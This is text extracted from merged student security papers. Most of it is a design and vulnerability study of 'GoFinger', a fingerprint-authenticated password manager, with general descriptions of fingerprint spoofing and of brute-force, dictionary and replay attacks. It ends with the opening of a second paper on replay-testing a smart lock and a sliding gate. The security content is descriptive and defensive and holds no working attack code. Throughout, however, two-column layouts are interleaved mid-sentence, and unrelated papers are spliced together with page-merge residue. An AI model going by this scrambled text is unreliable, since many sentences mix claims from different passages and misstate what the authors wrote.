Figure​ ​3​ ​:​ ​LastPass​ ​-​ ​Password​ ​Manager​ ​Interface

2.2.2​ ​1Password
1Password is the premium alternative for LastPass. Its intuitive
interface and securities are its competitive advantage. Offering
more than just a web-based product, 1Password is well-adopted for
Figure​ ​1​ ​:​ ​Security​ ​of​ ​Fingerprint​ ​Unlock​ ​vs.​ ​PIN​ ​from​ ​the​ ​perspective​ ​of​ ​former​ ​and​ ​current​ ​users​ ​of its​ ​desktop​ ​versions​ ​for​ ​both​ ​MacOS​ ​and​ ​Windows.
Fingerprint​ ​Unlock

Figure​ ​4​ ​:​ ​1Password​ ​-​ ​ ​Password​ ​Manager​ ​Interface

Figure​ ​2​ ​:​ ​Convenience​ ​of​ ​Fingerprint​ ​Unlock​ ​vs.​ ​PIN​ ​from​ ​the​ ​perspective​ ​of​ ​former​ ​and​ ​current
users​ ​of​ ​Fingerprint​ ​Unlock
2.2.3​ ​Browser’s​ ​Built-in​ ​Keystore

Familiar to many, major browsers such as Chrome, Firefox and


While our proposed system uses fingerprint authentication, it can
Safari offers a mindless interface that prompts its user to save
also be implemented with other forms of biometric authentication.
his/her​ ​password​ ​whenever​ ​a​ ​successful​ ​login​ ​is​ ​authenticated.
For example, recent trends such as the new release of iPhoneX
have seen an incorporation of facial recognition as a biometric

gp07
PDFsam_merge 46
50
is also associated with difficult passwords include reusing the same
password across different accounts, keeping the password as a text
file in the computer or keeping a file containing the password in a
cloud​ ​based​ ​storage​ ​system​ ​such​ ​as​ ​dropbox​[10]​.

From this we can see that the complexity of passwords ultimately


comes down to the tolerance and ability of the person himself.
Figure​ ​5​ ​:​ ​Chrome​ ​Inbuilt​ ​-​ ​ ​Password​ ​Manager​ ​Prompt
Having too complicated a password results in risky behaviour.
Having too simple a password although more user friendly reduces
Gaining​ ​vast​ ​popularity​ ​in​ ​recent​ ​years,​ ​use​ ​of​ ​password​ ​managers the time taken by software to break a password significantly.. Both
has​ ​been​ ​highly​ ​debatable​ ​as​ ​mentioned​ ​earlier.​ ​However,​ ​the
can​ ​result​ ​in​ ​rendering​ ​a​ ​password​ ​useless.
common​ ​understanding​ ​that​ ​password​ ​managers​ ​provides​ ​a​ ​higher
level​ ​of​ ​security​ ​as​ ​compared​ ​to​ ​the​ ​repetitive​ ​use​ ​of​ ​similar​ ​or In​ ​this​ ​study,​ ​we​ ​want​ ​explore​ ​the​ ​alternative​ ​solutions​ ​to​ ​the
simple​ ​passwords​ ​are​ ​widely​ ​accepted.​[7,8]
typical​ ​use​ ​of​ ​Master​ ​Passwords​ ​and​ ​adopt​ ​other​ ​forms​ ​of
authentication​ ​such​ ​as​ ​biometric​ ​systems​ ​on​ ​the​ ​phone.​ ​We​ ​also
For​ ​the​ ​purpose​ ​of​ ​this​ ​study,​ ​we​ ​will​ ​not​ ​focus​ ​on​ ​the​ ​possible​ ​of
want​ ​to​ ​preserve​ ​what​ ​is​ ​accepted​ ​to​ ​be​ ​good​ ​practices​ ​in​ ​keeping
breaches​ ​and​ ​security​ ​concerns​ ​that​ ​arises​ ​from​ ​the​ ​use​ ​of​ ​these
passwords​ ​and​ ​at​ ​the​ ​same​ ​time​ ​ensure​ ​user-friendliness​ ​is
managers​ ​but​ ​to​ ​understand​ ​its​ ​functionalities​ ​and​ ​implementation maintained​ ​such​ ​that​ ​no​ ​risky​ ​behavior​ ​is​ ​attempted.
methods.

Manager Authentication
Method
MFA Delivery
Method
3.​ ​FINGERPRINT​ ​SECURITY
LastPass Master​ ​Password Optional Cloud/Local ​ ​ ​ ​ ​SYSTEM
1Password Master​ ​Password Optional Cloud-based
3.1​ ​Fingerprint​ ​Scanner
Browser None No Cloud-based
In the 21st century, the most prevalent form of biometric
Figure​ ​6​ ​:​ ​Password​ ​Managers​ ​Summary
authentication in many mobile devices is the Fingerprint scanner.
The concept of integrating fingerprint authentication with
From​ ​the​ ​extracted​ ​table​ ​above,​ ​we​ ​can​ ​deduce​ ​that​ ​the​ ​common
smartphones was introduced by Toshiba in 2007. Six years later, in
way​ ​of​ ​authenticating​ ​a​ ​user​ ​when​ ​he​ ​requests​ ​for​ ​a​ ​password​ ​login
2013, this technology was further revolutionized by Apple Inc to
is​ ​through​ ​the​ ​use​ ​of​ ​the​ ​Master​ ​Password.​ ​MFA​ ​options​ ​can​ ​be
become a better and more usable component of a smartphone -
added​ ​to​ ​send​ ​verification​ ​codes​ ​and​ ​texts​ ​to​ ​the​ ​registered​ ​mobile
which​ ​is​ ​widely​ ​known​ ​as​ ​TouchID​TM​.
phones​ ​&​ ​applications​ ​for​ ​enhanced​ ​security.​ ​However,​ ​the​ ​use​ ​of​ ​a
weak​ ​master​ ​password​ ​or​ ​unactivated​ ​MFA​ ​option​ ​would​ ​expose
users​ ​to​ ​the​ ​similar​ ​vulnerability​ ​with​ ​higher​ ​risk​ ​-​ ​access​ ​to​ ​all
credentials.

2.3​ ​People​ ​and​ ​Password​ ​Management

People often play the most critical role in keeping passwords


secure. Most password breaches come from poor password
management practices that could have been prevented. A typical
password strength requirement sent may look something like the
following: Figure​ ​7​ ​:​ ​Apple​ ​Inc​ ​TouchID​ ​Logo
1. At​ ​least​ ​8​ ​characters​ ​long
2. Must​ ​contain​ ​at​ ​least​ ​one​ ​uppercase​ ​letter This concept of bringing in the biometric authentication into
3. Must​ ​contain​ ​at​ ​least​ ​one​ ​number day-to-day gadget was a breakthrough for mobile device security in
4. Must​ ​contain​ ​at​ ​least​ ​one​ ​symbol terms​ ​of​ ​data​ ​privacy​ ​and​ ​protection.
Although the above is usually a good criteria for setting safe Today, our team is bringing this biometric authentication beyond
passwords, people often get frustrated and try to take the easy way the scope of just mobile device authentication. We want to
out by still using passwords that are easy to break yet follow the extrapolate its usage into another day-to-day authentication system
above requirements. For example “P@ssw0rd” satisfies all the known​ ​as​ ​2​ ​Factor​ ​Authentication.
requirements but is still clearly a dictionary word making it
relatively easy to crack. Making the requirements much more Every fingerprint is unique, so it’s rare that even a small section of
complicated however has shown to increase user frustration​[9] and two separate fingerprints are alike enough to register as a match for
resort to other measures in order to remember their password. A Touch ID. The probability of this happening is 1 in 50,000 with a
survey conducted by ​digitalguardian on 1000 internet users single, enrolled finger. And Touch ID allows only five
discovered that a vast majority of users write down complicated on unsuccessful fingerprint match attempts before you must enter your
a piece of paper to help them remember. Other risky behavior that password. By comparison, the odds of guessing a typical 4-digit

gp07
PDFsam_merge 47
51
passcode are 1 in 10,000. Although some codes, like “1234,” might 3.3.1​ ​Phone​ ​Application​ ​(iOS)
be more easily guessed, there is no such thing as an easily The phone application serves the objective to authenticate the user
guessable​ ​fingerprint​ ​pattern. with its in-built biometric device (i.e. FingerPrint sensor,
TouchID). It will also be used to authenticate One Time Password
TouchID is made more secure with an advanced security (OTP) from our server. The application can be visualized as
architecture called Secure Enclave. It is a chip in the TouchID TouchID on the Macbook Pro in the similar context described
devices, which was developed to protect your passcode and earlier.
fingerprint data. Touch ID doesn't store any images of your
Built on the latest technology of React Native, we harnessed the
fingerprint, and instead relies only on a mathematical
capabilities to scale this form factor to multiple platforms and
representation. It isn't possible for someone to reverse engineer the
access native hardwares such fingerprint sensors. For the purpose
actual​ ​fingerprint​ ​image​ ​from​ ​this​ ​stored​ ​data.
of this study, we will be focusing on the iOS version of the
The fingerprint data is encrypted, stored on device, and protected
application to allow more time for testing and analysis of the
with a key available only to the Secure Enclave. The fingerprint
completed​ ​product.
data is used only by the Secure Enclave to verify that the
fingerprint matches the enrolled fingerprint data. It can’t be
accessed by the OS on your device or by any applications running 3.3.2​ ​Chrome​ ​Extension
on it. It's never stored on Apple servers, it's never backed up to The key purpose of the chrome extension is to provide the
iCloud or anywhere else, and it can't be used to match against other functionality to detect and extend the ability to authenticate a user
fingerprint​ ​databases. when he encounters a login request. The user will be prompted
with additional login method, where it will send a request for
3.2​ ​Implementation password to the secured server and to the phone for biometric
authentication.
For the purpose of this feasibility study, we have adopted the
concept from the latest series of MacBook Pro that offered inbuilt 3.3.3​ ​Web​ ​Services
TouchID systems where it authenticates the user with a fingerprint
These web services function as an interface between the chrome
when a login prompt is detected. The solution offered high-level of
extension and phone application, fulfilling requests and sanctioning
biometric​ ​security​ ​without​ ​compromising​ ​convenience.​[7]
authorization. These web services are only surfed securely through
https request only and requires authenticated auth tokens to make
request​ ​to​ ​sensitive​ ​information.

3.3.4​ ​Secured​ ​Server


Figure​ ​8​ ​:​ ​Macbook​ ​Pro​ ​Touch​ ​ID These servers are configured with SSL certificates to ensure secure
communication. Server is secured with hardening options and
Extending the concept to web-based security, we enrolled the use RSA-SSH keys are used for authentication. Root account is
of the iPhone’s TouchID capabilities and paired it with a Chrome disabled.
extension to act as a simplified password manager. The further
*We have to make the assumption that the server is sufficiently secured to handle
sections​ ​will​ ​explain​ ​each​ ​component​ ​and​ ​its​ ​usage​ ​in​ ​detail. sensitive​ ​information​ ​for​ ​the​ ​proof-of-concept.

3.3​ ​Component​ ​Architectur​e


3.3.5​ ​Database/Vault
These database are configured with limited access to only the
secured server to prevent unauthorized request. Database is also
hardened​ ​to​ ​remove​ ​unauthorized​ ​access.
*Similarly, the assumption that the database is sufficiently secured is required to carry
out​ ​the​ ​proof-of-concept

3.4​ ​Chrome​ ​Extension​ ​-​ ​Password​ ​Manager

The extension is built using the Google Chrome libraries and it


Figure​ ​9​ ​:​ ​High-Level​ ​Component​ ​Communication​ ​Design adopts the architecture of Browser Action extension. Its main
functionalities are carried out in two main scripts which are
running in the browser background and in the browser content(the
Required​ ​Components: webpage itself) respectively. Both javascripts are written in an
1. Phone​ ​Application​ ​(iOS) OOP where important browser variables are encapsulated in the
2. Chrome​ ​Extension main controller object of the scripts. This prevents users from
3. Webservices accessing the variables from the in-browser console. Chrome
4. Secured​ ​server
extension talks to the server via the HTTPS based API endpoints
5. Database/vault and receives secure push-notifications from the server via
FCM(Firebase Cloud Messaging) by Google. Furthermore, we
closely studied an existing password manager, ​LastPass,

gp07
PDFsam_merge 48
52
implementation of its chrome extension functionalities in the Upon user clicking the fingerprint, the extension sends a request to
following​ ​areas:- the API endpoint and receives the push-notification via
FCM(Firebase Cloud Messaging) once the user has authenticated
3.4.1​ ​Detection​ ​of​ ​the​ ​login​ ​form​ ​by​ ​the​ ​in-browser​ ​extension his/hers​ ​fingerprint​ ​via​ ​the​ ​GoFinger​ ​mobile​ ​app.

This was done through iterating the ​<form> ​DOM-objects of the


3.4.4​ ​Detection​ ​of​ ​the​ ​input​ ​fields​ ​by​ ​the​ ​in-browser​ ​extension
active page and picking the very first <​form>. ​It is necessary to
When the extension receives the user’s credential necessary for
detect the login form DOM objects because the extension is task to
login,​ ​the​ ​extension​ ​will​ ​fill​ ​them​ ​into​ ​the​ ​appropriate​ ​inputs.
inject a GoFinger fingerprint button to the form field so that users
are able to use that fingerprint to authenticate. More details will be Detection of input fields was done through iterating the DOM
provided​ ​in​ ​the​ ​subsequent​ ​sections. objects of the active page and identify any input fields with name
containing the any substring of the following
variations(represented​ ​in​ ​JSON​ ​object​ ​format):
{
username​: [ ​ “email”, “username”, “name”, “user”]​,
password​:​ ​[“pass”,​ ​“password”]
Figure​ ​10A:​ ​After​ ​login​ ​form​ ​identification,​ ​Injection​ ​of​ ​GoFinger​ ​fingerprint​ ​onto​ ​the​ ​webpage }

Figure​ ​14​ ​:​ ​DOM​ ​Inputs​ ​with​ ​name​ ​containing​ ​substring


“email”​ ​&​ ​“pass”
Figure​ ​10B:​ ​Enlarged​ ​view​ ​of​ ​GoFinger​ ​fingerprint

3.4.2​ ​Pairing​ ​of​ ​Mobile​ ​Number​ ​with​ ​the​ ​User’s​ ​Account


3.5​ ​Go​ ​Finger​ ​Authentication​ ​App

Figure​ ​11:​ ​Pairing​ ​with​ ​mobile​ ​number

Figure​ ​12:​ ​GoFinger​ ​OTP​ ​Request


Figure​ ​15​ ​:​ ​Detailed​ ​Phone​ ​Application​ ​(Finger)​ ​Flow
*You​ ​will​ ​be​ ​able​ ​to​ ​find​ ​an​ ​expanded​ ​version​ ​in​ ​the​ ​appendix​ ​for​ ​easy​ ​reference.
Using registered mobile number to verify your account via the
extension and once the mobile number has been verified by the
The above diagram illustrates the entire process flow of the mobile
GoFinger server, the extension will then request for the OTP that is
application. As indicated, the process can be isolated into four
being sent to the provided number, to verify that the user who is
main sections. The ​login flow, ​authentication flow, ​register flow
requesting to login via chrome extension indeed own the device
and​ ​the​ ​request​ ​received​ ​flow.
with​ ​the​ ​provided​ ​mobile​ ​number.
3.5.1​ ​Login​ ​Flow
3.4.3​ ​Request​ ​Credentials​ ​via​ ​Fingerprint The login flow requires the user to enter a valid mobile number
that he has possession of. The mobile and IMEI number are used as
an unique identifier for the user. Once a valid mobile number is
entered, a verification SMS is sent to authenticate if the user owns
the​ ​phone​ ​number​ ​-​ ​similar​ ​to​ ​2FA.

3.5.2​ ​Authentication​ ​Flow


The authentication flow requires the user to input a randomly
generate 6 digit number that he/she receives at the phone number
Figure​ ​13:​ ​GoFinger​ ​Request​ ​Credential​ ​via​ ​two​ ​methods​ ​(In-browser​ ​or​ ​Extension​ ​Popup)
specified earlier. The authentication code is only valid for two

gp07
PDFsam_merge 49
53
minutes. If the user is able to provide the code, we can sufficiently 3.6.2​ ​Login
believe​ ​that​ ​he​ ​has​ ​ownership​ ​to​ ​the​ ​mobile​ ​number​ ​indicated.

3.5.3​ ​Registration​ ​Flow


Users that are new to the system will be sent to the registration
flow. We will ask for his name for personalization and more
importantly, his/her email address that will help to recover his/her The login process on the chrome extension will require a 6-digit
account when there is a change in the mobile number of the phone validation. Once the user is validated, the secret key is returned and
device​ ​itself​ ​(IMEI​ ​number​ ​changed) will be used in further transactions (To store and retrieve user
credentials)
3.5.4​ ​Main​ ​Page
This page notifies that the user is all set-up and ready to use the 3.6.3​ ​Storing​ ​Credentials
system. He/she will be able to receive push notifications on
requests sent from the chrome extension counterpart. Once the
notification is opened, it will lead the individual to the verification
page.​ ​The​ ​app​ ​do​ ​not​ ​need​ ​to​ ​be​ ​opened​ ​to​ ​receive​ ​notification.

3.5.5​ ​Request​ ​Flow Users are prompted to save their login credentials with us when
The request flow is activated whenever a request from the chrome he/she login a new site successfully for the first time. These
extension counterpart is made by the user. A prompt to request for credentials are then encrypted with AES256 before being sent over
the the server for safekeeping. No plaintext usernames or
enrolled fingerprint is made. The user must have fingerprints
enrolled and also a fingerprint scanner available on the phone. If passwords​ ​are​ ​stored​ ​on​ ​the​ ​server.
these​ ​conditions​ ​are​ ​not​ ​met,​ ​the​ ​user​ ​will​ ​be​ ​denied​ ​access.
3.6.4​ ​Retrieving​ ​Credentials
If the user is unable to verify himself through the fingerprint, he
can request to retry. However, he will not be able to fallback to a
PIN code password for authentication. Disabling the ability for this
fallback helps to prevent unauthorized access to users who may
know​ ​the​ ​authorized​ ​user’s​ ​passcode.
When requesting for credentials, the server will return the
Once the authentication is made, the credentials are sent from the encrypted credentials back to the chrome extension after the
server and back to the chrome extension to log the user in. The fingerprint authentication is successful. These credentials are then
success​ ​status​ ​page​ ​will​ ​be​ ​shown. decrypted by the shared key that the chrome extension stores. The
chrome​ ​extension​ ​will​ ​not​ ​store​ ​any​ ​credential.
3.6​ ​Information​ ​Transmission​ ​(How​ ​secure​ ​is​ ​it?)
3.6.1​ ​Registering​ ​for​ ​Account 3.6.5​ ​Auth​ ​Token​ ​(Session​ ​Token)
Each of these request made to the server (from the phone
application/chrome extension) requires an authentication token to
be verified. This auth token is only provided after the OTP is
successfully verified. This token is made valid for 30 days to
ensure freshness in the token. Without the auth token, the server
Registration of account is only made available from the phone will​ ​deny​ ​all​ ​access​ ​to​ ​any​ ​sensitive​ ​information.
application. This is because the whole implementation will require
the chrome extension and phone to be paired. Without any of the 3.6.6​ ​Communications
above, the whole authentication process will not work. Removing
All communications between the app/chrome extension to the
unwanted account creation can prevent unauthorized users from
server and from server to database are secured using HTTPS.
causing​ ​unwanted​ ​issues.
Servers are installed with SSL certifications signed by Comodo.
This​ ​ensures​ ​that​ ​the​ ​data​ ​transferred​ ​are​ ​encrypted​ ​and​ ​secured.
The IMEI hash is stored to the database and used as a shared key to
be later used from encryption and decryption of the user’s
credentials. Storing the hash also prevents the user from using
unauthorized devices. Validation to ensure that the authentication
comes​ ​from​ ​the​ ​correct​ ​device​ ​is​ ​carried​ ​out​ ​in​ ​every​ ​transaction. 3.6.7​ ​Server​ ​Hardening​ ​/​ ​Database​ ​Hardening
Some​ ​of​ ​the​ ​precautions​ ​taken​ ​are​ ​as​ ​listed​ ​below.
1. Root​ ​Accounts​ ​are​ ​disabled
2. Password​ ​Access​ ​are​ ​disabled
3. Login​ ​only​ ​possible​ ​through​ ​SSH
4. Limit​ ​access​ ​of​ ​IP​ ​range​ ​to​ ​the​ ​server​ ​only
5. Only​ ​allow​ ​access​ ​to​ ​ports​ ​in​ ​use

gp07
PDFsam_merge 50
54
4.​ ​ANALYSIS the same database with the encrypted data. Any exploits on the
database will reveal the key with the encrypted data where hackers
Two sub-teams were formed from our group to represent the can​ ​reverse​ ​the​ ​original​ ​credentials.
black-box and white-box hackers. The black-box hackers were
given the functional packaged chrome extension and exported To secure the key better, the next step is the improve the structure
phone application. The white-box hackers were provided both of the database. The vault that holds the credentials should be
source​ ​code​ ​and​ ​the​ ​functional​ ​applications. separated into multiple instances where the shared key and
The objective of this testing is to analyse the vulnerabilities and credentials are on different databases. Credentials can also be
loopholes that the developers may have overlooked. Vulnerabilities divided into a small chunk where each database is only responsible
and test cases that were reported were patched and reviewed before for​ ​a​ ​small​ ​portion.
iterating​ ​the​ ​process​ ​again.
Therefore, the hacker will be required to hack through these
4.1​ ​Identified​ ​Vulnerabilities​ ​/​ ​Problems secured databases with different authentications before being able
to​ ​get​ ​hold​ ​of​ ​the​ ​whole​ ​credential.
Problem Decryption​ ​of​ ​credentials​ ​at​ ​server
Developers decrypted the credentials for testing
5.​ ​VULNERABILITIES​ ​AND
and did not remove it after development was
completed. POSSIBLE​ ​ATTACKS
5.1​ ​Fingerprint​ ​Authentication​ ​Vulnerabilities
Solution Decryption​ ​codes​ ​were​ ​removed.
The majority of smartphones use a capacitive sensor, which images
Reporter White-box a fingerprint by applying a voltage to a finger and measure it
electrically. Researcher from Michigan State University​[11] had
done a proof of concept of forging and bypassing capacitive
Problem Single​ ​Point​ ​of​ ​Failure fingerprint sensor by using a inkjet printer loaded with conductive
ink to print a spoofed fingerprint and successfully bypassed even
If user do not own the mobile number, he will lose
access​ ​to​ ​all​ ​his​ ​passwords. the​ ​highly​ ​regarded​ ​Apple’s​ ​Touch​ ​ID.

Solution Recovery email is included in registration and In addition, due to the small fingerprint sensor on smartphones, it is
verified. unable to capture the entire fingerprint and have to store partial
fingerprint of each finger​[12]​. This results in significantly less
Reporter Black-box security as compared to a bigger scanner capable of taking a full
fingerprint image as the likelihood of getting a match to 10 images
is​ ​higher​ ​than​ ​a​ ​match​ ​from​ ​a​ ​single​ ​image.
Problem Push​ ​Notification​ ​still​ ​received​ ​after​ ​logout
The logout process only clears the user information Apart from the physical limitations and vulnerabilities of the
on the device but do not blocks push notifications fingerprint scanner, there are also attacks that can compromise the
requesting​ ​to​ ​authenticate software used to authenticate the fingerprint data. For instance, an
attacker may be able to modify the fingerprint authentication
Solution Ensure that the token is revoked on the server and software to output an artificially high matching score such that an
remove the user from listening to updates when the unauthorized user can gain access to the phone without the
user​ ​is​ ​logged​ ​out. fingerprint of an authorized user ​[13]​. Furthermore, the output of
the fingerprint recognition software can also be modified, such that
Reporter Black-box a​ ​negative​ ​match​ ​is​ ​overwritten​ ​to​ ​be​ ​a​ ​positive​ ​match.

5.2​ ​Password​ ​Authentication​ ​Vulnerabilities


Problem IMEI​ ​as​ ​Shared​ ​Key​ ​Vulnerabilty
IMEI numbers are not a well kept secret and can be Our proposed system integrates the use of fingerprint
easily retrieved by hackers. Using it as a shared authentication in conjunction with the existing password
key​ ​will​ ​make​ ​it​ ​easy​ ​to​ ​be​ ​exposed​ ​and​ ​exploited. authentication systems that have been implemented by most web
applications. However, this implies that our system still retain the
Solution Reconsider​ ​other​ ​ways​ ​to​ ​create​ ​shared​ ​keys potential vulnerabilities associated with the current password
authentication system. Besides being susceptible to human errors,
Reporter Special​ ​Mention​ ​to​ ​Prof​ ​Hugh password authentications systems are also vulnerable to a wide
variety​ ​of​ ​known​ ​attacks.

4.2​ ​Suggestions​ ​(Future​ ​Plans) A popular password attack is the brute force attack, which is
As a security authentication feature, this implementation has to be characterized by the generation of all possible combinations to find
secured to garner any trust from the community. The direct a string that matches the password. Typically, brute force attacks
vulnerability we face at the moment is to have the shared key on are used on encrypted passwords, where all possible combinations

gp07
PDFsam_merge 51
55
of the password are generated and encrypted [15]. If the attacker biometric authentication systems become more accurate they will
manages to acquire a password file, it can be matched against the become​ ​harder​ ​to​ ​fool​ ​as​ ​well.
list of encrypted passwords to find the original password. Brute
force attacks are very time consuming but are particularly effective 7.​ ​ACKNOWLEDGMENTS
for​ ​small​ ​passwords.
We would like to thank Prof Hugh Anderson of National
A variant of the brute force attack is the dictionary attack where University of Singapore for giving us this opportunity to write this
common or frequently occurring words are matched against the paper and providing constant guidance for our project. This
password instead of all possible combinations. While the dictionary research opportunity and his accompanying lectures have
attack is faster than the brute force attack, it is limited in scope and broadened our perspective towards security and to better our
encompasses the possibility that the password may not be in the understanding​ ​in​ ​the​ ​field.
computed​ ​dictionary​ ​[15].

Another password attack is the replay attack, where an attacker can 8.​ ​REFERENCES
insert himself in the middle of the line of communication between
client and server by replaying data packets during the [1] Lisa Eadicicco. 2014. The Man Who Invented The Computer
authentication​ ​process. Password Admits That It's Become A Nightmare. (May
2014). Retrieved November 10, 2017 from
http://www.businessinsider.com/inventor-of-the-password-20
Other known password attacks include shoulder surfing, phishing, 14-5
key​ ​loggers​ ​etc.
[2] Seth Rosenblatt, Jason Cipriani. 2013. Two-factor
authentication: What you need to know (FAQ). (May 2013).
5.3​ ​Password​ ​Storage​ ​Vulnerabilities Retrieved November 10, 2017 from
https://www.cnet.com/news/two-factor-authentication-what-
Our system allows users to specify the credentials they wish to you-need-to-know-faq/
store at the beginning. It is ideal if they use a very complicated
password or use a random password generator. However, a user [3] Chandrasekhar Bhagavatula, Blase Ur, Kevin Iacovino, Su
Mon Kywe, Lorrie Faith Cranor, and Marios Savvides. 2015.
may still use a simple password such as “password” for his
Biometric Authentication on iPhone and Android: Usability,
account. The credentials are stored in a server that is encrypted Perceptions, and Influences on Adoption. ​Proceedings 2015
using AES 256. The passwords are also appended with salt prior to Workshop on Usable Security (2015).
encryption before being stored in the database. Therefore the only DOI:http://dx.doi.org/10.14722/usec.2015.23003
effective attack against our system would be bruteforcing and
[4] Darren Guccione. The Most Common Passwords of 2016.
dictionary​ ​attacks.
Retrieved November 10, 2017 from
https://keepersecurity.com/public/Most-Common-Passwords-
Ideally authentication and the storage of credentials would be done of-2016-Keeper-Security-Study.pdf
on separate servers, however due to our limited resources we did it
on​ ​the​ ​same​ ​server. [5] K.Brittain,​ ​ ​R.​ ​Paquet.​ ​Determining​ ​the​ ​cost​ ​of​ ​a
non-automated​ ​help​ ​desk.​ ​Gartner​ ​Research​ ​Group;​ ​2003.

[6] Randy Abrams, Jerry Su, Pauline Chen, Thompson Wu,


6.​ ​CONCLUSIONS Derrick Yang, and Haas Liu. 2016. China Smartphones
Sector. (January 2016). Retrieved November 10, 2017 from
The main issue faced by today’s security systems is their reliance https://research-doc.credit-suisse.com/docView?sourceid=em
on passwords. Passwords are part of the knowledge category that &document_id=x675378&serialid=Y1p6aGBM4ca8YeQ5se
require humans to remember. However a typical person can only IPCDUoDvUzjVc5p4c4dlQKcwU%3d
remember passwords that may not be strong enough in the future. [7] Lory Gil. 2017. Why Touch ID makes the MacBook Pro the
As a result an intermediate medium to help people remember best Mac ever. (February 2017). Retrieved November 10,
passwords comes into play in the form of written passwords to 2017 from
password managers. Although our solution removes the need for https://www.imore.com/why-touch-id-makes-macbook-pro-b
remembering passwords explicitly and makes it solely based on est-mac-ever
inherence and possession, the main vulnerability still lies within [8] Kate Knibbs. 2015. Am I An Idiot for Still Using a Password
current systems that find it too difficult to migrate away from using Manager? . (June 2015). Retrieved November 10, 2017 from
a password altogether. This is due to the fact that making the jump https://gizmodo.com/am-i-an-idiot-for-still-using-a-password
relies on user having a form or device that can validate their -manager-1711673486
fingerprint at all times. As of 2017, 67% of all smartphones have a
[9] NIST​ ​Special​ ​Publication​ ​800-63B:​ ​2017.​ ​Retrieved
fingerprint scanner ​[12]​. However there are an estimated 2.32 November​ ​10,​ ​2017​ ​from
billion smartphone users​[14] which means a good chunk of people https://pages.nist.gov/800-63-3/sp800-63b.html#appA​.
will be left out when the shift to biometrics begins. However we
believe that this shift is necessary as the cracking of the plain [10] Uncovering​ ​Password​ ​Habits:​ ​Are​ ​Users’​ ​Password​ ​Security
Habits​ ​Improving?​ ​(Infographic):​ ​2017.​ ​Retrieved​ ​November
password is systematic with simple tried and true methods given
10,​ ​2017​ ​from
enough time. Cracking biometric systems currently require https://digitalguardian.com/blog/uncovering-password-habits
specialised equipment and knowledge not everyone possess and as

gp07
PDFsam_merge 52
56
-are-users-password-security-habits-improving-infographic​. Retrieved​ ​November​ ​10,​ ​2017​ ​from
https://www.statista.com/statistics/330695/number-of-smartph
[11] Kai Cao and Anil K. Jain. ​Hacking Mobile Phones Using 2D one-users-worldwide/​https://www.statista.com/statistics/3306
Printed​ ​Fingerprints​,​ ​Michigan. 95/number-of-smartphone-users-worldwide/

[12] Aditi Roy, Nasir Memon, and Arun Ross. 2017. MasterPrint: [15] Raza, Mudassar et al. "A Survey Of Password Attacks And
Exploring the Vulnerability of Partial Fingerprint-Based Comparative Analysis On Methods For Secure
Authentication Systems. ​IEEE Transactions on Information Authentication." ​World Applied Sciences Journal​, 2012,
Forensics and Security 12, 9 (2017), 2013–2025. doi:10.5829/idosi.wasj.2012.19.04.1837.
DOI:http://dx.doi.org/10.1109/tifs.2017.2691658
[16]​ ​Matyáš,​ ​Václav​ ​and​ ​Zdeněk​ ​Říha.​​ ​Biometric​ ​Authentication​ ​-​
[13] Umut Uludag and Anil K. Jain. 2004. Attacks on biometric Security​ ​and​ ​Usability​.​ ​Advanced​ ​Communications​ ​and
systems: a case study in fingerprints. ​Security, Multimedia​ ​Security.​ ​(​2002)​ ​Retrieved​ ​November​ ​10,​ ​2017
Steganography, and Watermarking of Multimedia Contents from
VI​ ​(2004).​ ​DOI:​http://dx.doi.org/10.1117/12.530907 http://www.fi.muni.cz/usr/matyas/cms_matyas_riha_biometri
cs.pdf
[14] Anon.​ ​Number​ ​of​ ​smartphone​ ​users​ ​worldwide​ ​2014-2020.

gp07
PDFsam_merge 53
57
9.​ ​APPENDIX
Figure​ ​13​ ​:​ ​Detailed​ ​Phone​ ​Application​ ​(Finger)​ ​Flow

gp07
PDFsam_merge 54
58
gp07
PDFsam_merge 55
59
gp07
PDFsam_merge 56
60
HOME SECURITY
Guo Jiaqi Kowshik Sundararajan Low Yong Siang
National University of Singapore National University of Singapore National University of Singapore
School of Computing School of Computing School of Computing
A0130646L A0132791E A0139392X
a0130646@u.nus.edu kowshik.sundararajan@u.nus.edu e0003277@u.nus.edu

Muhammad Mustaqiim Bin Muhar Mun Le Yuan


National University of Singapore National University of Singapore
School of Computing School of Computing
A0138664W A0143853A
mustaqiim.muhar@u.nus.edu e0007868@u.nus.edu

ABSTRACT requirement, low cost and compatibility with a large number of


In this paper, we will be illustrating our methodology in testing the hardware. There are a number of markets for BLE, especially in the
security of two home devices: a sliding gate and a smart lock, Noke. smart home, healthcare and sports sectors.
We conducted our test on Noke with a BLE Sniffer, Bluefruit LE
Sniffer, to obtain BLE packets for further analysis with Wireshark. BLE shares the same spectrum range (the 2.400 - 2.4835 GHz ISM
Our test on the sliding gate security mechanism was conducted with band) as Classic Bluetooth but instead of using 79 1MHz channels,
a software defined radio (SDR) and a Raspberry Pi as a transmitter BLE uses 40 2MHz channels. Similar to Classic Bluetooth, data is
for replaying the radio signal. In each of these tests, we intended to transmitted using Gaussian frequency shift modulation within a
capture communication packets sent to and from the home devices channel.
and replay them to test the susceptibility of each of the devices to
replay attacks. 2.2 BLE Security
The 128-bit AES-CCM encryption scheme is used to prevent
Categories and Subject Descriptors passive man-in-the-middle (MITM) eavesdropping attacks on a
B.4.1 [Input/output and Data Communications]: Data BLE link. Two BLE devices need to set up pairing before
Communication Devices, C.2.2 [Computer System communication can be encrypted. The Security Manager Protocol
Organization]: Network Protocols, C.2.3 [Computer System (SMP) carries out the pairing process in three steps:
Organization]: Network Operations – Applications (Bluetooth),
Network Monitoring. 1. Initially, one of the BLE devices will send a “pairing request”
to the other device. Then, the two devices announce their input
General Terms and output capabilities, which are used to determine if they are
Documentation, Experimentation, Security. going to set up a secure connection in Step 2. [2] It is important
to note that all data exchanged during this step is unencrypted.
Keywords 2. When Step 1 is done, the devices will generate and exchange
Home Security, Sliding Gate, Padlock, Noke, Smart Locks, the Temporary Key (TK) using one of the pairing methods
Vulnerabilities, Replay Attack, Raspberry Pi. mentioned below. Then, the two devices will verify that they
use the same TK by exchanging Confirm and Rand Values.
1. INTRODUCTION After that, they will use the TK and some random number to
As technology advances, devices are starting to become more create the Short Term Key (STK). The STK is then used to
interconnected in order to bring about convenience to the users. In encrypt the connection. [2]
recent years, this convenience has been brought to homes, turning 3. This step is optional. It is only used if bonding requirements
homes into smart homes, where home devices can now connect to were exchanged in Step 1. In this step, each device will
the Internet and be controlled by phones. But the added distribute to other devices these several transport specific
convenience comes at cost - security. How secure are these smart keys: Long Term Key (LTK), Connection Signature
devices? Resolving Key (CSRK), Identity Resolving Key (IRK). [2]

This project aims to look at how secure two of such smart home There are three pairing methods available for BLE secure
